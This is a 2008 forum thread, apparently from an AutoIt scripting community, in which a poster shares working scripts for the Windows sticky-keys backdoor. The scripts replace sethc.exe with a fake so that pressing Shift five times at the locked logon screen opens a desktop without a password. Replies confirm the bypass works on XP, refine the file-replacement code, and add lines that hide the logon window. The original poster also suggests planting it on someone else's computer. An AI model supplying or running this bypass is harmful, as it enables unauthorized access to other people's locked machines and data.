WinHack

[JellyFish666]

I am not sure if I am allowed sharing it if not I shouldn't post my other scripts

What does this do?

- well this is a exploit that takes advantage of Windows "sticky key function" (note sticky keys needs to be turned on)

How does this work?

- when your logged off on your computer "sticky keys function" is still active so by replacing this file with a fake "sticky key function" you can do whatever you want WOW!

Give me a Example

- Run the Injector.au3

- click Enable

- Logoff (were you enter your password)

- hit shift x5 (may be more) if it doesn't work you need to enable "sticky keys"

then the Attack.au3 will launch explorer.exe and if you hit CRTL-ALT-DELETE it should show you another type of window asking for password (old school login) but just let it sit there and don't touch it and you should be able to access your desktop...

DO NOT FORGET TO DISABLE - my attack.au3 only opens up explorer but if you add your own script and "sticky key" the attack will launch...

ONLY TESTED ON WINXP

Injector.au3

If Not FileExists(@ScriptDir & "\Real.exe") Then
    FileCopy(@HomeDrive & "\Windows\System32\sethc.exe" , @ScriptDir & "\Real.exe")
EndIf

#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
$Restore = GUICreate("Restore", 200, 25)
$Enable = GUICtrlCreateButton("Enable", 0, 0, 100, 25, 0)
$Disable = GUICtrlCreateButton("Disable", 100, 0, 100, 25, 0)
GUISetState(@SW_SHOW)

While 1
    $Msg = GUIGetMsg()
    Switch $Msg
        Case $GUI_EVENT_CLOSE
            Exit
        Case $Enable
            GUICtrlSetState($Enable , $GUI_DISABLE)
            FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
            FileCopy(@ScriptDir & "\Fake.exe" , @HomeDrive & "\Windows\System32\sethc.exe" , 1)
            Exit
        Case $Disable 
            GUICtrlSetState($Disable , $GUI_DISABLE)
            FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
            FileCopy(@ScriptDir & "\Real.exe" , @HomeDrive & "\Windows\System32\sethc.exe" , 1)
            Exit
    EndSwitch
WEnd

Attack.au3

Run("Explorer.exe")

I changed the pictures a bit but they will give you an idea

TaskBar on log on screen and if you push CTRL-ALT-DELETE you will get your desktop

I hid my icons of course for safety reasons

Edited August 4, 2008 by JellyFish666

[Zinthose]

I just gave this a try and I have to admit, scary and cool.

The File Protection complains about replacing the file. Pressing Shift 5 times dose indeed initialize Explorer while the system is "Locked". It dose not however place focus to explorer as the locked screen is still dominate. I'm sure this can be somehow worked around.

I see this example to demonstrate a possible security risk to Windows. To possibly allow a passerby to "Shift" there way into a locked system, as an example. I don't consider this a pressing matter as the system must already be compromised to install this hack. Thus making this exploit more of a novelty than a genuine threat.

I'm running this on an XP SP2 x86 system with up to date system patches.

[BillLuvsU]

How about you rename it as a "Proof-of-Concept". Because we know you would never actually use this. Other than that, good job on the exploit.

Edit: As far as the actual exploit goes, I don't see any risk at all. Basically the point of hacking is to get your code running on their machine. But if you can get an executable all the way to their system folders than you can just put it in their startup folder. Or somthing else. On another note however I could se this being useful as a fun way to start up a launcher program you make or somthing similer.

Edited August 4, 2008 by BillLuvsU

[WeMartiansAreFriendly]

Could you close the winlogin window?

[Zinthose]

  mrRevoked said:

Could you close the winlogin window?

Just tried it... caused the systems to BSOD and reboot.

[GHOSTSKIKDA]

Hi

FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")

Better to write ( FilseDlete(@SystemDir & "\sethc.exe"))

Bye ...

[JellyFish666]

To bypass the screen once you see your Taskbar push "Ctrl-Alt-Delete" and Success

I just called it a hack and people misuse that word I was meaning a different kind of hacker and yes this could be good and bad but I only see good coming from it I mean sure you could write a virus but Autoit doesn't really have a way of running unless your virus activates on "Sticky Keys" lol

Replacing the @HomeDrive Macro is smart didn't think of it at the time start this short project early in the morning with no sleep.

The File Protection complains about replacing the file

- what OS

- what Anti Virus

- what file protection (windows?)

A good use and may be shouldn't be tried but would be nice... if someone is letting you use there computer Enable this script and you can access their computer you are sort of limited because of the log on screen (I know how to disable it but not releasing that I wasn't even going to release this...)

Could you close the winlogin window?

Just tried it... caused the systems to BSOD and reboot.

lol yes it takes more than killing processes at least the way I do it...

{==Edited==}

Last time ill edit this post lol, I just got back from work but later I might show a good example of using this I got lots of idea's

Edited August 4, 2008 by JellyFish666

[crashdemons]

can you HIDE the login window?

[JellyFish666]

  crashdemons said:

can you HIDE the login window?

better yet you can disable it

[BinaryBrother]

WinSetState("Log on to Windows","",@SW_HIDE)

WinSetState("Log on to Windows","",@SW_DISABLE) ;Don't use DISABLE... It leaves the window apparent, and simply disabled input to that window...

Either This should work seamlessly...

I'm for helping people... Even if it really isn't 'helping'..

Edited August 6, 2008 by BinaryBrother